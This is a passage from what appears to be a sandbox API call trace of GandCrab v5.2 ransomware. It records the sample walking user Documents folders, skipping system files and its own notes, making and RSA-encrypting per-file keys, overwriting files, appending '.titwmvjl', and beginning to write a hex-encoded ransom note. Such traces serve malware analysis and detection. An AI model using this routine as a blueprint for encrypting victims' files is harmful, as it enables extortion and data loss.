dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.750] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.750] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.751] CloseHandle (hObject=0x2bc) returned 1 [0089.751] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\GhzE5QHKEIrI\\4KhSQHfpuUM.doc" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\ghze5qhkeiri\\4khsqhfpuum.doc"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\GhzE5QHKEIrI\\4KhSQHfpuUM.doc.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\ghze5qhkeiri\\4khsqhfpuum.doc.titwmvjl"), dwFlags=0x1) returned 1 [0089.752] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.752] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0089.752] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0089.752] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0089.752] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\GhzE5QHKEIrI\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\GhzE5QHKEIrI\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\GhzE5QHKEIrI\\d2ca4a09d2ca4deb61a.lock" [0089.752] lstrlenW (lpString=".titwmvjl") returned 9 [0089.752] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\GhzE5QHKEIrI\\d2ca4a09d2ca4deb61a.lock") returned 80 [0089.752] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.752] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\GhzE5QHKEIrI\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 89 [0089.752] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\GhzE5QHKEIrI\\d2ca4a09d2ca4deb61a.lock") returned 80 [0089.752] lstrlenW (lpString=".lock") returned 5 [0089.752] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.752] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0089.752] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.753] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.753] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0089.753] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0089.753] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0089.753] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\GhzE5QHKEIrI\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\GhzE5QHKEIrI\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\GhzE5QHKEIrI\\TITWMVJL-DECRYPT.txt" [0089.753] lstrlenW (lpString=".titwmvjl") returned 9 [0089.753] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\GhzE5QHKEIrI\\TITWMVJL-DECRYPT.txt") returned 76 [0089.753] VirtualAlloc (lpAddress=0x0, dwSize=0xd8, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.753] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\GhzE5QHKEIrI\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 85 [0089.753] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\GhzE5QHKEIrI\\TITWMVJL-DECRYPT.txt") returned 76 [0089.753] lstrlenW (lpString=".txt") returned 4 [0089.753] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.753] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0089.753] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0089.753] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.754] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\GhzE5QHKEIrI\\TITWMVJL-DECRYPT.txt") returned 76 [0089.754] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\GhzE5QHKEIrI\\TITWMVJL-DECRYPT.txt") returned 76 [0089.754] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0089.754] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0089.754] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0089.754] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0089.754] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0089.754] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0089.754] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0089.754] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0089.754] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.754] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 0 [0089.754] FindClose (in: hFindFile=0x503638 | out: hFindFile=0x503638) returned 1 [0089.755] CloseHandle (hObject=0x2b4) returned 1 [0089.755] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0089.755] lstrcmpW (lpString1="O6IXT45vrI.docx", lpString2=".") returned 1 [0089.755] lstrcmpW (lpString1="O6IXT45vrI.docx", lpString2="..") returned 1 [0089.755] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\", lpString2="O6IXT45vrI.docx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\O6IXT45vrI.docx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\O6IXT45vrI.docx" [0089.755] lstrlenW (lpString=".titwmvjl") returned 9 [0089.755] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\O6IXT45vrI.docx") returned 58 [0089.755] VirtualAlloc (lpAddress=0x0, dwSize=0xb4, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.755] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\O6IXT45vrI.docx.titwmvjl") returned 67 [0089.755] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\O6IXT45vrI.docx") returned 58 [0089.755] lstrlenW (lpString=".docx") returned 5 [0089.755] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.755] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".docx ") returned 6 [0089.755] lstrcmpiW (lpString1=".docx", lpString2=".titwmvjl") returned -1 [0089.755] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.755] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\O6IXT45vrI.docx") returned 58 [0089.755] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\O6IXT45vrI.docx") returned 58 [0089.755] lstrcmpiW (lpString1="O6IXT45vrI.docx", lpString2="desktop.ini") returned 1 [0089.755] lstrcmpiW (lpString1="O6IXT45vrI.docx", lpString2="autorun.inf") returned 1 [0089.756] lstrcmpiW (lpString1="O6IXT45vrI.docx", lpString2="ntuser.dat") returned 1 [0089.756] lstrcmpiW (lpString1="O6IXT45vrI.docx", lpString2="iconcache.db") returned 1 [0089.756] lstrcmpiW (lpString1="O6IXT45vrI.docx", lpString2="bootsect.bak") returned 1 [0089.756] lstrcmpiW (lpString1="O6IXT45vrI.docx", lpString2="boot.ini") returned 1 [0089.756] lstrcmpiW (lpString1="O6IXT45vrI.docx", lpString2="ntuser.dat.log") returned 1 [0089.756] lstrcmpiW (lpString1="O6IXT45vrI.docx", lpString2="thumbs.db") returned -1 [0089.756] lstrcmpiW (lpString1="O6IXT45vrI.docx", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0089.756] lstrcmpiW (lpString1="O6IXT45vrI.docx", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0089.756] lstrcmpiW (lpString1="O6IXT45vrI.docx", lpString2="KRAB-DECRYPT.html") returned 1 [0089.756] lstrcmpiW (lpString1="O6IXT45vrI.docx", lpString2="CRAB-DECRYPT.html") returned 1 [0089.756] lstrcmpiW (lpString1="O6IXT45vrI.docx", lpString2="KRAB-DECRYPT.txt") returned 1 [0089.756] lstrcmpiW (lpString1="O6IXT45vrI.docx", lpString2="CRAB-DECRYPT.txt") returned 1 [0089.756] lstrcmpiW (lpString1="O6IXT45vrI.docx", lpString2="ntldr") returned 1 [0089.756] lstrcmpiW (lpString1="O6IXT45vrI.docx", lpString2="NTDETECT.COM") returned 1 [0089.756] lstrcmpiW (lpString1="O6IXT45vrI.docx", lpString2="Bootfont.bin") returned 1 [0089.756] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\O6IXT45vrI.docx") returned 58 [0089.756] lstrlenW (lpString=".docx") returned 5 [0089.756] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.756] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".docx ") returned 6 [0089.756] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.756] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.756] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\O6IXT45vrI.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\o6ixt45vri.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0089.757] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.757] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0089.757] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.757] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.758] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0089.759] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.759] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.759] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.759] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0089.759] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.759] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.759] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.760] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.760] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0089.761] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.761] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.761] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.761] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0089.761] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.761] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.762] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.762] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.762] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0089.763] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.763] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503338) returned 1 [0089.764] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.764] CryptGetKeyParam (in: hKey=0x503338, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0089.764] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.764] CryptEncrypt (in: hKey=0x503338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0089.764] GetLastError () returned 0x0 [0089.764] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.764] CryptDestroyKey (hKey=0x503338) returned 1 [0089.764] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.764] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.764] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.765] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0089.766] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.766] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5033f8) returned 1 [0089.766] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.766] CryptGetKeyParam (in: hKey=0x5033f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0089.766] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.766] CryptEncrypt (in: hKey=0x5033f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0089.766] GetLastError () returned 0x0 [0089.766] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.766] CryptDestroyKey (hKey=0x5033f8) returned 1 [0089.766] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.767] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.767] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0089.767] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0089.767] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0x173b5, lpOverlapped=0x0) returned 1 [0089.774] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffe8c4b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.774] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x173b5, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0x173b5, lpOverlapped=0x0) returned 1 [0089.775] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0089.776] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.780] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.780] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.780] CloseHandle (hObject=0x2b4) returned 1 [0089.781] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\O6IXT45vrI.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\o6ixt45vri.docx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\O6IXT45vrI.docx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\o6ixt45vri.docx.titwmvjl"), dwFlags=0x1) returned 1 [0089.781] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.781] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0089.781] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0089.781] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0089.782] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\TITWMVJL-DECRYPT.txt" [0089.782] lstrlenW (lpString=".titwmvjl") returned 9 [0089.782] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\TITWMVJL-DECRYPT.txt") returned 63 [0089.782] VirtualAlloc (lpAddress=0x0, dwSize=0xbe, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.782] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 72 [0089.782] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\TITWMVJL-DECRYPT.txt") returned 63 [0089.782] lstrlenW (lpString=".txt") returned 4 [0089.782] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.782] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0089.782] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0089.782] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.782] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\TITWMVJL-DECRYPT.txt") returned 63 [0089.782] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\TITWMVJL-DECRYPT.txt") returned 63 [0089.782] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0089.782] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0089.782] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0089.782] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0089.782] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0089.782] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0089.782] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0089.782] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0089.782] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.783] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0089.783] lstrcmpW (lpString1="uXcvp3mK09d", lpString2=".") returned 1 [0089.783] lstrcmpW (lpString1="uXcvp3mK09d", lpString2="..") returned 1 [0089.783] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\", lpString2="uXcvp3mK09d" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d" [0089.783] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\" [0089.783] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0089.783] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0089.783] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0089.783] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0089.783] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0089.783] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0089.783] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0089.784] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0089.784] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0089.784] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.784] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.784] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\\\TITWMVJL-DECRYPT.txt") returned 76 [0089.784] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0089.784] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e